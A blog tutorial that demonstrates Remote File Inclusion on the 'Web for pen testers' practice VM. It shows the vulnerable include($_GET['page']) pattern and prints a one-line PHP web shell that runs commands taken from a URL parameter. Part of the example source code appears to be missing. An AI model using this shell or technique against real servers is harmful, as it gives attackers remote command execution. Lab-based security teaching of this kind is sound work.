Remote File Inclusion [RFI]

HacksLand | The computer science playground

Posted by Thilan Dissanayaka on Aug 12, 2019

Remote File Inclusion or RFI is a vulnerability occurs in web applications.

We use a Linux distribution called "Web for pen testers". You can download it from hear. Now boot the virtual mashing. You'll see a screen like this.

Yes it is a Debian based OS with lot of examples that demonstrate common vulnerabilities like Command injection, SQL injection , Cross Site Scripting etc. Apache server and MySQL are per-installed on this mashing.

Now use you web browser to browse the IP that we discovered in last step. You can see following web interface. Wow there are many vulnerabilities to explorer.There are more to practice with this VM.

In this tutorial we are going to focus on Remote file inclusion. So let's select example1 of File include category.

In the URL you can see a parameter like following.


Now think what it does? when example1.php is loaded intro.php will be automatically included and what ever in that file will be executed. Now. let's see what actually happens inside the hood.

hear you can see the source code of example1.php

<?php require_once '../header.php'; ?>


        if ($_GET["page"]) {



<?php require_once '../footer.php'; ?>

There are something to notice. Did you see 2  statements called include. and require_once . Both of them are used to insert another php script into current file.

require method give an error when given file is not exist. So current script stops executing.

include method give a warning  and the rest of the script will be continued.

Now in above example1.php they have used include($_GET["page"])); .

In several places I  have explained about  $_GET[]. Do you remember what it does?It will fetch the URL parameter called page and put it on the include function.

Now what if we  can include  a PHP web shell  using this method?  What we have to do is upload the shell to a server and input shell's url as the page parameter. I hope you got a clear idea on RFI. Let's see how we can do this practically.

In above SS I logged into VM and looked for files. Actually this step is not needed. Let's create a dummy php file for testing purpose.

Now I host that file on another VM and give the dummy file's URL as the input. Let's see what happen.

Wow it is working .

Now let's build actual php shell. In a previous tutorial I explained you how to build a quick web shell.

<?php echo '<pre>' . shell_exec($_GET['cmd']) . '</pre>' ; ?>

Hear you can see the final result.


I hope you enjoyed the tutorial. Leave a comment if you need any tutorials on these topics. I'll try my maximum to write a post. :-)

Hi, I'm Thilan. An engineering student from SriLanka. I love to code with Python, JavaScript PHP and C.

Also read

Sep 05
PHP MySQL tutorial | create delete and modify tables

This is the second tutorial of our PHP+MySQL tutorial serious.In last tutorial we saw that how we....

Aug 12
How to use python as a http server

Hello guys, Today I'm hear with another quick tutorial. in this one I'll explain you how we can....

Apr 16
Wordpress nulled theme checker

We all love free stuff. So many people try to install premium themes and plugins on there WordPress....